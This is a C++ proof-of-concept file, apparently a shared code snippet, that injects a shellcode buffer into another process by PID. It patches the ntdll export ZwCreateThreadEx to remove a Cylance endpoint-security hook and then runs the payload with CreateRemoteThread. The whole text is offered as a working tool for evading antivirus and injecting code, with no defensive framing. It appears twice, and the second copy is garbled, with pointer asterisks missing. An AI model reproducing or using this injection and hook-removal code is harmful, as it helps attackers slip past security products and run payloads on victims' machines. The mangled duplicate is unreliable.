qgrosperrin/poc.c

## poc.c
#include <iostream>
#include <windows.h>
unsigned char buf[] =
"SHELLCODE_GOES_HERE";
struct syscall_table {
    int osVersion;
};
// Remove Cylance hook from DLL export
void removeCylanceHook(const char *dll, const char *apiName, char code) {
    DWORD old, newOld;
    void *procAddress = GetProcAddress(LoadLibraryA(dll), apiName);
    printf("[*] Updating memory protection of %s!%s\n", dll, apiName);
    VirtualProtect(procAddress, 10, PAGE_EXECUTE_READWRITE, &old);
    printf("[*] Unhooking Cylance\n");
    memcpy(procAddress, "\x4c\x8b\xd1\xb8", 4);
    *((char *)procAddress + 4) = code;
    VirtualProtect(procAddress, 10, old, &newOld);
}

int main(int argc, char **argv)
{
    if (argc != 2) {
        printf("Usage: %s PID\n", argv[0]);
        return 2;
    }
    DWORD processID = atoi(argv[1]);
    HANDLE proc = OpenProcess(PROCESS_ALL_ACCESS, false, processID);
    if (proc == INVALID_HANDLE_VALUE) {
        printf("[!] Error: Could not open target process: %d\n", processID);
        return 1;
    }
    printf("[*] Opened target process %d\n", processID);
    printf("[*] Allocating memory in target process with VirtualAllocEx\n");
    void *alloc = VirtualAllocEx(proc, NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (alloc == (void*)0) {
        printf("[!] Error: Could not allocate memory in target process\n");
        return 1;
    }
    printf("[*] Allocated %d bytes at memory address %p\n", sizeof(buf), alloc);
    printf("[*] Attempting to write into victim process using WriteProcessMemory\n");
    if (WriteProcessMemory(proc, alloc, buf, sizeof(buf), NULL) == 0) {
        printf("[!] Error: Could not write to target process memory\n");
        return 1;
    }
    printf("[*] WriteProcessMemory successful\n");

    // Remove the NTDLL.DLL hook added by userland DLL
    removeCylanceHook("ntdll.dll", "ZwCreateThreadEx", 0xBB);
    printf("[*] Attempting to spawn shellcode using CreateRemoteThread\n");
    HANDLE createRemote = CreateRemoteThread(proc, NULL, 0, (LPTHREAD_START_ROUTINE)alloc, NULL, 0, NULL);
    printf("[*] Success :D\n");
}
	#include <iostream>
	#include <windows.h>
	unsigned char buf[] =
	"SHELLCODE_GOES_HERE";
	struct syscall_table {
	int osVersion;
	};
	// Remove Cylance hook from DLL export
	void removeCylanceHook(const char dll, const char apiName, char code) {
	DWORD old, newOld;
	void *procAddress = GetProcAddress(LoadLibraryA(dll), apiName);
	printf("[*] Updating memory protection of %s!%s\n", dll, apiName);
	VirtualProtect(procAddress, 10, PAGE_EXECUTE_READWRITE, &old);
	printf("[*] Unhooking Cylance\n");
	memcpy(procAddress, "\x4c\x8b\xd1\xb8", 4);
	((char )procAddress + 4) = code;
	VirtualProtect(procAddress, 10, old, &newOld);
	}

	int main(int argc, char **argv)
	{
	if (argc != 2) {
	printf("Usage: %s PID\n", argv[0]);
	return 2;
	}
	DWORD processID = atoi(argv[1]);
	HANDLE proc = OpenProcess(PROCESS_ALL_ACCESS, false, processID);
	if (proc == INVALID_HANDLE_VALUE) {
	printf("[!] Error: Could not open target process: %d\n", processID);
	return 1;
	}
	printf("[*] Opened target process %d\n", processID);
	printf("[*] Allocating memory in target process with VirtualAllocEx\n");
	void *alloc = VirtualAllocEx(proc, NULL, sizeof(buf), MEM_COMMIT \| MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	if (alloc == (void*)0) {
	printf("[!] Error: Could not allocate memory in target process\n");
	return 1;
	}
	printf("[*] Allocated %d bytes at memory address %p\n", sizeof(buf), alloc);
	printf("[*] Attempting to write into victim process using WriteProcessMemory\n");
	if (WriteProcessMemory(proc, alloc, buf, sizeof(buf), NULL) == 0) {
	printf("[!] Error: Could not write to target process memory\n");
	return 1;
	}
	printf("[*] WriteProcessMemory successful\n");

	// Remove the NTDLL.DLL hook added by userland DLL
	removeCylanceHook("ntdll.dll", "ZwCreateThreadEx", 0xBB);
	printf("[*] Attempting to spawn shellcode using CreateRemoteThread\n");
	HANDLE createRemote = CreateRemoteThread(proc, NULL, 0, (LPTHREAD_START_ROUTINE)alloc, NULL, 0, NULL);
	printf("[*] Success :D\n");
	}